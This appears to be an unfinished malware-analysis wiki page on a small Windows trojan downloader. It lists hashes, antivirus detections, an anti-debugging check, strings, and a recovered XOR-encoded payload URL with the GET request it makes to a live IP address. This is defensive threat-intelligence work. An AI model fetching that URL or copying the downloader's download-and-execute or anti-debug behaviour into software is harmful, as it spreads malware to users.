77f1f61ade4b3d8ea179c77a1f94e00f
Jump to navigation
Jump to search
Description
Summary
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.
Thank you for your comprehension.
Packer
The malware is not packed
Identification
MD5 | 77f1f61ade4b3d8ea179c77a1f94e00f |
---|---|
SHA1 | d663516dd0a07ed1bb3d396ab9227678b36168f6 |
SHA256 | 259543f15f315338e7589a036bd916c7a0a9011fe288b4c6ca13b0f62c0db74b |
ssdeep | 192:1dPCXEd553SAYT9FJtKE7g8kxJEw8oHAKIb/i:2X4mAulPih82a |
imphash | e6ff134ef1c2551faf58990dc90eab51 |
File size | 8.5 KB ( 8704 bytes ) |
File type | Win32 EXE |
Magic literal | PE32 executable for MS Windows (GUI) Intel 80386 32-bit |
Antivirus detection
Antivirus | Result | Update |
---|---|---|
AVG | Generic29.CJAT | 20140220 |
Ad-Aware | Trojan.Generic.8003982 | 20140220 |
AntiVir | TR/Rogue.8003982.3 | 20140220 |
Antiy-AVL | Trojan[Downloader:HEUR]/Win32.Unknown | 20140219 |
Avast | Win32:Trojan-gen | 20140220 |
BitDefender | Trojan.Generic.8003982 | 20140220 |
Commtouch | W32/Downloader-Sml!Eldorado | 20140220 |
Comodo | UnclassifiedMalware | 20140220 |
ESET-NOD32 | probably unknown NewHeur_PE | 20140220 |
Emsisoft | Trojan.Generic.8003982 (B) | 20140220 |
F-Prot | W32/Downloader-Sml!Eldorado | 20140220 |
Fortinet | NewHeur_PE | 20140220 |
GData | Trojan.Generic.8003982 | 20140220 |
Ikarus | Trojan-Downloader.Win32.Small | 20140220 |
Jiangmin | TrojanDownloader.Generic.aigb | 20140220 |
Kaspersky | HEUR:Trojan-Downloader.Win32.Generic | 20140220 |
McAfee | Artemis!77F1F61ADE4B | 20140220 |
McAfee-GW-Edition | Artemis!77F1F61ADE4B | 20140220 |
MicroWorld-eScan | Trojan.Generic.8003982 | 20140220 |
NANO-Antivirus | Trojan.Win32.DownloaderSml!.bdenni | 20140220 |
Norman | Downloader | 20140220 |
Sophos | Mal/Generic-S | 20140220 |
Symantec | Trojan.Gen | 20140220 |
TrendMicro | TROJ_GEN.R0CBC0OI413 | 20140220 |
TrendMicro-HouseCall | TROJ_GEN.R0CBC0OI413 | 20140220 |
VIPRE | Trojan-Downloader.Win32.Small!cobra (v) | 20140220 |
nProtect | Trojan.Generic.8003982 | 20140220 |
Agnitum | 20140219 | |
AhnLab-V3 | 20140220 | |
Baidu-International | 20140220 | |
Bkav | 20140220 | |
ByteHero | 20140220 | |
CAT-QuickHeal | 20140220 | |
CMC | 20140220 | |
ClamAV | 20140220 | |
DrWeb | 20140220 | |
F-Secure | 20140220 | |
K7AntiVirus | 20140219 | |
K7GW | 20140219 | |
Kingsoft | 20130829 | |
Malwarebytes | 20140220 | |
Microsoft | 20140220 | |
Panda | 20140220 | |
Qihoo-360 | 20140220 | |
Rising | 20140219 | |
SUPERAntiSpyware | 20140220 | |
TheHacker | 20140220 | |
TotalDefense | 20140219 | |
VBA32 | 20140220 | |
ViRobot | 20140220 |
Defensive capabilities
IsDebuggerPresent
The IsDebuggerPresent method is present in the code and detects the presence of OllyDbg
.text:01001290 call ds:IsDebuggerPresent
.text:01001296 test eax, eax
.text:01001298 jnz loc_100146D
Dynamic analysis
Network indicators
HTTP request to 1.234.27.146:
GET /pcfix.exe?affid=23456732-34459 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: 1.234.27.146 Connection: Keep-Alive
Files
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.
Thank you for your comprehension.
Registry keys
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.
Thank you for your comprehension.
Mutexes
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.
Thank you for your comprehension.
Static analysis
Sections
Name VirtAddr VirtSize RawSize Entropy -------------------------------------------------------------------------------- .text 0x1000 0x1388 0x1400 6.167402 .data 0x3000 0x784 0x600 4.493349 .reloc 0x4000 0x400 0x400 2.738901
Strings
In the clear
Could not retrieve temporary path, exiting Could not execute file, exiting Check Could not download the URL to our target path, exiting Downloading Could not create tmpfile, exiting ('8PW 700PP ```hhh xppwpp PSSSSSSS URPQQh L$,3 UVWS [_^] SVWj _^[] 8csm t h|7 8csm _^[] Y__^[ t?!E v N+D$ UQPXY]Y[ CreateProcessA OutputDebugStringA GetTempFileNameA GetTempPathA IsDebuggerPresent KERNEL32.dll strncat strncpy memset __getmainargs _cexit _exit _XcptFilter exit _initterm _amsg_exit __setusermatherr __p__commode __p__fmode __set_app_type msvcrt.dll ?terminate@@YAXXZ _controlfp URLDownloadToFileA urlmon.dll InterlockedExchange Sleep InterlockedCompareExchange RtlUnwind SetUnhandledExceptionFilter GetModuleHandleA QueryPerformanceCounter GetTickCount GetCurrentThreadId GetCurrentProcessId GetSystemTimeAsFileTime TerminateProcess GetCurrentProcess UnhandledExceptionFilter kU'9 HMXB ?Zd; ?/L[ S;uD z?aUY D?$? U>c{ zc%C1 .:3q -64OS NKeb 1,202 333@3I3O3b3i3 3J4S4^4d4 505:5M5W5\5a5 6"6*63696A6M6d6o6u6 727H7m7y7 :,;:; ;$<)<H<_< =-=:=F=N=V=b=t= >$>*>4>=>H>V>[>a>l>s>
Additional XOR-encoded strings
The following additional XOR-encoded strings confirm the request seen during the behavioral analysis
$ ./xorsearch -i -s /data/tmp/getdown.exe http: Found XOR 83 position 1800: http://1.234.27.146/pcfix.exe $ strings /data/tmp/getdown.exe.XOR.83 [SNIP] http://1.234.27.146/pcfix.exe affid=23456732-34459 [SNIP]
IAT
KERNEL32.dll
|
msvcrt.dll
|
urlmon.dll
|